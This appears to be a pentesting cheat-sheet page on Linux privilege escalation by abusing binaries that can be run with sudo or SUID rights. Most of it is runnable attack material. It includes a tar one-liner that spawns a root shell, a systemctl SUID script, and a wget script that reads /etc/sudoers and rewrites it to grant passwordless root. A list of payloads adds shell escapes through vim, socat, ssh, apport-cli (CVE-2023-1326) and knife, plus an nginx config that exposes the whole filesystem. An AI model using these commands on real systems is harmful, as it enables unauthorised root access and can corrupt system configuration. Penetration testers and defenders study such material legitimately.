GTFOBins
GTFOBins (9.5k β) a.k.a. "Get The Fuck Out" is a list of way to exploit binaries such as sed/tar/... to get root.
Common use cases are:
- Binary was given SUID/GUID permissions
- Binary was given capabilities
- User was granted sudo permission to binary
- ...
Note that not every exploit may pop a shell. Some only allow you to edit some files, which may help getting root.
Example π₯
You can only run tar using sudo. Run the command below from GTFOBins, and you will get a root shell.
$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
β‘οΈ You can use GTFOBLookup (0.2k β) for offline browsing.
β‘οΈ You may need/want to create a root bash.
β‘ SUID systemctl script
Description: this script makes it easier to run several commands using systemctl.
Create a file script.sh with the contents below
TF=$(mktemp).service
echo "[Service]
Type=oneshot
ExecStart=/bin/sh -c '$@ > /tmp/output'
[Install]
WantedBy=multi-user.target" > $TF
systemctl -f link $TF
systemctl -f enable --now $TF
cat /tmp/output
Calls
$ chmod +x script.sh
$ ./script.sh id
$ ./script.sh ls -laR /root
β‘ SUDO wget script
Description: this script automate privilege escalation using wget.
It's quite easy to do it manually, but you need two machines (ex: your VM and the target). This script is complex because everything is done locally, without interacting with your VM!
-
Will use
wgetto fetch/etc/sudoersandncto grab the result -
Then, it will replace the line giving access to
wgetand give you the permission to run every command as root -
Then, we will start a python web server, and use
wgetwith-oto replace our new sudo file with the tampered one. -
Finally, the script run
sudo bashand open your shell as root
β οΈ The script may mess with your sudoers file if something goes wrong. I destroyed my VM 7 times before managing to make the script work π³. If you understand the commands used in the script, use them one by one, and check the tampered sudoers file (output) BEFORE overriding the current one.
file=/etc/sudoers
port=4444
# todo: use mktemp
output=stolenfile
# Working in /tmp
cd /tmp
# -d and -q 0 to quit when connection is closed
nc -dlnp $port -q 0 > $output &
# -q = quiet, and -T 1 = close after one second
sudo wget -q --post-file=$file localhost:$port -T 1
# remove the HTTP headers
sed -i '1,9d' $output
# replace the command with find
sed -i "s/\($(whoami).*\)/$(whoami) ALL=(ALL) NOPASSWD:ALL/g" $output
# create a web server
python3 -m http.server $port &
pid=$(echo $!)
sleep 1 # let the webserver start
# get the file then kill the webserver
# replace /etc/sudoers
sudo wget -q localhost:$port/$output -O $file && kill $pid
# open the root shell
sudo bash
Random Payloads
If we are allowed to run a command as sudo:
- Common commands
$ sudo vim -c ':!/bin/sh'
$ sudo socat stdin exec:/bin/bash
$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
- apport-cli 2.26.0 and earlier has a vulnerability (CVE-2023-1326)
$ sudo /usr/bin/apport-cli --file-bug
> 1
> 2
> F # any key
> V # view report (open less)
:!/bin/bash
-
/usr/bin/systemctl status xxx.service
While it may be secure, if a reader is opened, such as less, it may be leveraged to run commands e.g. using !/bin/bash for less.
-
/usr/bin/knife: knife can be exploited in many ways
$ sudo knife environment edit _default -e vim # -> sudo vim
$ sudo knife environment edit _default -e rootbash.sh
$ sudo knife exec --exec "exec '/bin/sh -i'"
$ echo -n 'exec "/bin/bash -i"' > config.rb
$ sudo knife user list -c config.rb
-
nginxcan be used to read files. It may also be used to write files usingdav_methods PUT;. For instance, adding an entry in authorized keys or sudoers.
$ cat $(pwd)/test.conf
user root;
events {
worker_connections 768;
}
http {
server {
listen 80;
server_name pwned.test;
location / {
root /;
autoindex on;
}
}
}
$ sudo nginx -s stop
$ sudo nginx -c $(pwd)/test.conf